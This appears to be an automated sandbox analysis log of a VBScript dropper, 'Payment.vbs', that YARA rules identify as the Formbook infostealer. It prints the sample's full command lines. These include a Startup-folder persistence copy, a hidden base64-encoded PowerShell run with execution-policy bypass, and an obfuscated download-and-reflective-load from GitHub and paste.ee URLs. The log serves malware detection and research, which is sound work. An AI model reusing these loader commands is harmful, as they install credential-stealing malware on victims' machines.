Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49842 version: TLS 1.2

E-Banking Fraud

Source: Yara match File source: 10.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.3538540839.00000000049D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2728680734.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2728578874.0000000003C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2976888806.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2727369839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3536826392.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2976926414.0000000003440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 10.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 10.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000018.00000002.3538540839.00000000049D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2728680734.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2728578874.0000000003C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.2976888806.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2727369839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.3536826392.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.2976926414.0000000003440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 2436, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3768, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Payment.vbs Static file information: Suspicious name
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0042C853 NtClose, 10_2_0042C853
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039435C0 NtCreateMutant,LdrInitializeThunk, 10_2_039435C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942B60 NtClose,LdrInitializeThunk, 10_2_03942B60
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942DF0 NtQuerySystemInformation,LdrInitializeThunk, 10_2_03942DF0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942C70 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_03942C70
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03944340 NtSetContextThread, 10_2_03944340
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03943090 NtSetValueKey, 10_2_03943090
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03943010 NtOpenDirectoryObject, 10_2_03943010
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03944650 NtSuspendThread, 10_2_03944650
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942B80 NtQueryInformationFile, 10_2_03942B80
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942BA0 NtEnumerateValueKey, 10_2_03942BA0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942BF0 NtAllocateVirtualMemory, 10_2_03942BF0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942BE0 NtQueryValueKey, 10_2_03942BE0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942AB0 NtWaitForSingleObject, 10_2_03942AB0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942AD0 NtReadFile, 10_2_03942AD0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942AF0 NtWriteFile, 10_2_03942AF0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039439B0 NtGetContextThread, 10_2_039439B0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942F90 NtProtectVirtualMemory, 10_2_03942F90
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942FB0 NtResumeThread, 10_2_03942FB0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942FA0 NtQuerySection, 10_2_03942FA0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942FE0 NtCreateFile, 10_2_03942FE0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942F30 NtCreateSection, 10_2_03942F30
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942F60 NtCreateProcessEx, 10_2_03942F60
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942E80 NtReadVirtualMemory, 10_2_03942E80
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942EA0 NtAdjustPrivilegesToken, 10_2_03942EA0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942EE0 NtQueueApcThread, 10_2_03942EE0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942E30 NtWriteVirtualMemory, 10_2_03942E30
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942DB0 NtEnumerateKey, 10_2_03942DB0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942DD0 NtDelayExecution, 10_2_03942DD0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942D10 NtMapViewOfSection, 10_2_03942D10
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03943D10 NtOpenProcessToken, 10_2_03943D10
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942D00 NtSetInformationFile, 10_2_03942D00
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942D30 NtUnmapViewOfSection, 10_2_03942D30
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03943D70 NtOpenThread, 10_2_03943D70
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942CA0 NtQueryInformationToken, 10_2_03942CA0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942CC0 NtQueryVirtualMemory, 10_2_03942CC0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942CF0 NtOpenProcess, 10_2_03942CF0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942C00 NtQueryInformationProcess, 10_2_03942C00
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942C60 NtCreateKey, 10_2_03942C60
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D4340 NtSetContextThread,LdrInitializeThunk, 19_2_036D4340
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D4650 NtSuspendThread,LdrInitializeThunk, 19_2_036D4650
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D35C0 NtCreateMutant,LdrInitializeThunk, 19_2_036D35C0
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2B60 NtClose,LdrInitializeThunk, 19_2_036D2B60
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2BE0 NtQueryValueKey,LdrInitializeThunk, 19_2_036D2BE0
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 19_2_036D2BF0
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2BA0 NtEnumerateValueKey,LdrInitializeThunk, 19_2_036D2BA0
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2AF0 NtWriteFile,LdrInitializeThunk, 19_2_036D2AF0
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2AD0 NtReadFile,LdrInitializeThunk, 19_2_036D2AD0
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D39B0 NtGetContextThread,LdrInitializeThunk, 19_2_036D39B0
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2F30 NtCreateSection,LdrInitializeThunk, 19_2_036D2F30
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2FE0 NtCreateFile,LdrInitializeThunk, 19_2_036D2FE0
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2FB0 NtResumeThread,LdrInitializeThunk, 19_2_036D2FB0
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2EE0 NtQueueApcThread,LdrInitializeThunk, 19_2_036D2EE0
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2E80 NtReadVirtualMemory,LdrInitializeThunk, 19_2_036D2E80
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2D30 NtUnmapViewOfSection,LdrInitializeThunk, 19_2_036D2D30
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2D10 NtMapViewOfSection,LdrInitializeThunk, 19_2_036D2D10
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2DF0 NtQuerySystemInformation,LdrInitializeThunk, 19_2_036D2DF0
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2DD0 NtDelayExecution,LdrInitializeThunk, 19_2_036D2DD0
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2C60 NtCreateKey,LdrInitializeThunk, 19_2_036D2C60
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2C70 NtFreeVirtualMemory,LdrInitializeThunk, 19_2_036D2C70
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2CA0 NtQueryInformationToken,LdrInitializeThunk, 19_2_036D2CA0
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D3010 NtOpenDirectoryObject, 19_2_036D3010
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D3090 NtSetValueKey, 19_2_036D3090
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2B80 NtQueryInformationFile, 19_2_036D2B80
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2AB0 NtWaitForSingleObject, 19_2_036D2AB0
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2F60 NtCreateProcessEx, 19_2_036D2F60
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2FA0 NtQuerySection, 19_2_036D2FA0
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2F90 NtProtectVirtualMemory, 19_2_036D2F90
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2E30 NtWriteVirtualMemory, 19_2_036D2E30
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2EA0 NtAdjustPrivilegesToken, 19_2_036D2EA0
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D3D70 NtOpenThread, 19_2_036D3D70
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2D00 NtSetInformationFile, 19_2_036D2D00
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D3D10 NtOpenProcessToken, 19_2_036D3D10
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2DB0 NtEnumerateKey, 19_2_036D2DB0
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2C00 NtQueryInformationProcess, 19_2_036D2C00
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2CF0 NtOpenProcess, 19_2_036D2CF0
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036D2CC0 NtQueryVirtualMemory, 19_2_036D2CC0
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_0356F9F8 NtSetContextThread, 19_2_0356F9F8
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_0356F02A NtQueryInformationProcess,NtReadVirtualMemory, 19_2_0356F02A
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_0356F038 NtQueryInformationProcess, 19_2_0356F038
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\SysWOW64\convert.exe Code function: String function: 036D5130 appears 36 times
Source: C:\Windows\SysWOW64\convert.exe Code function: String function: 0371F290 appears 105 times
Source: C:\Windows\SysWOW64\convert.exe Code function: String function: 0368B970 appears 266 times
Source: C:\Windows\SysWOW64\convert.exe Code function: String function: 036E7E54 appears 89 times
Source: C:\Windows\SysWOW64\convert.exe Code function: String function: 0370EA12 appears 84 times
Source: C:\Windows\SysWOW64\appidtel.exe Code function: String function: 03945130 appears 36 times
Source: C:\Windows\SysWOW64\appidtel.exe Code function: String function: 0397EA12 appears 86 times
Source: C:\Windows\SysWOW64\appidtel.exe Code function: String function: 03957E54 appears 96 times
Source: C:\Windows\SysWOW64\appidtel.exe Code function: String function: 0398F290 appears 105 times
Source: C:\Windows\SysWOW64\appidtel.exe Code function: String function: 038FB970 appears 268 times
Source: Payment.vbs Initial sample: Strings found which are bigger than 50
Source: 10.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 10.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000018.00000002.3538540839.00000000049D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2728680734.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2728578874.0000000003C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.2976888806.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2727369839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.3536826392.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.2976926414.0000000003440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2436, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3768, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@20/12@3/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4436:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3320:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aftf20og.0ld.ps1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: convert.exe, 00000013.00000002.2974673632.0000000002FEA000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2974673632.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000003.2912164452.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000003.2914622076.0000000002FC7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICgoKCdoJysnUmZ1JysncmwgPSBoM2todHRwczonKycvLycrJ3JhJysndy4nKydnaXRodScrJ2J1Jysnc2VyJysnY29udGVuJysndC5jb20nKycvTm8nKydEZXRlY3RPJysnbi9Ob0RldGVjdE9uL3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtJysnVi50eHRoM2s7IGhSJysnZmInKydhc2U2NCcrJ0NvbnRlbnQgPScrJyAoTmUnKyd3LU9iamVjdCBTeXN0ZScrJ20uTicrJ2V0LldlYicrJ0NsaWVudCkuRG93bmxvYWRTdHInKydpbmcnKycoaFInKydmdXJsKTsgaFInKydmYmluYXInKyd5QycrJ29udGVudCA9IFtTJysneScrJ3N0ZW0uQ29udmVyJysndF06JysnOkZyb21CYScrJ3MnKydlNjRTdHInKydpbmcoaCcrJ1JmYicrJ2EnKydzJysnZTY0Q28nKydudGVudCcrJyknKyc7IGgnKydSZmEnKydzcycrJ2VtYmx5ID0gW1JlZmxlJysnY3Rpb24nKycuQXNzZW1ibHknKyddOjpMb2FkKGhSZmJpbmFyeUNvbnRlbnQpOyBbZCcrJ25saWInKycuSU8uSG9tZV06OlZBSSgnKydDdXQwL08nKycxRktTL2QvZWUuZXRzYXAnKycvLzpzcHR0aCcrJ0N1dCwgQ3UnKyd0ZCcrJ2VzYXRpdmFkb0N1dCwnKycgJysnQ3UnKyd0ZGVzYXRpdmFkb0N1dCwgJysnQ3V0ZGUnKydzYXRpdmFkb0N1dCwgQ3V0ZCcrJ2VzJysnYXQnKydpdmEnKydkbycrJ0N1dCwnKycgQycrJ3V0MUMnKyd1dCwgQ3V0YXBwaWR0ZWxDdXQpJykgIC1jUkVwbEFjRSdDdXQnLFtjSEFSXTM0ICAtUkVwTEFDZSAgKFtjSEFSXTEwNCtbY0hBUl04MitbY0hBUl0xMDIpLFtjSEFSXTM2ICAtUkVwTEFDZShbY0hBUl0xMDQrW2NIQVJdNTErW2NIQVJdMTA3KSxbY0hBUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ((('h'+'Rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/No'+'DetectO'+'n/NoDetectOn/refs/heads/main/De'+'tahNoth-'+'V.txth3k; hR'+'fb'+'ase64'+'Content ='+' (Ne'+'w-Object Syste'+'m.N'+'et.Web'+'Client).DownloadStr'+'ing'+'(hR'+'furl); hR'+'fbinar'+'yC'+'ontent = [S'+'y'+'stem.Conver'+'t]:'+':FromBa'+'s'+'e64Str'+'ing(h'+'Rfb'+'a'+'s'+'e64Co'+'ntent'+')'+'; h'+'Rfa'+'ss'+'embly = [Refle'+'ction'+'.Assembly'+']::Load(hRfbinaryContent); [d'+'nlib'+'.IO.Home]::VAI('+'Cut0/O'+'1FKS/d/ee.etsap'+'//:sptth'+'Cut, Cu'+'td'+'esativadoCut,'+' '+'Cu'+'tdesativadoCut, '+'Cutde'+'sativadoCut, Cutd'+'es'+'at'+'iva'+'do'+'Cut,'+' C'+'ut1C'+'ut, CutappidtelCut)') -cREplAcE'Cut',[cHAR]34 -REpLACe ([cHAR]104+[cHAR]82+[cHAR]102),[cHAR]36 -REpLACe([cHAR]104+[cHAR]51+[cHAR]107),[cHAR]39))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\appidtel.exe "C:\Windows\SysWOW64\appidtel.exe"
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Process created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"
Source: C:\Windows\SysWOW64\convert.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
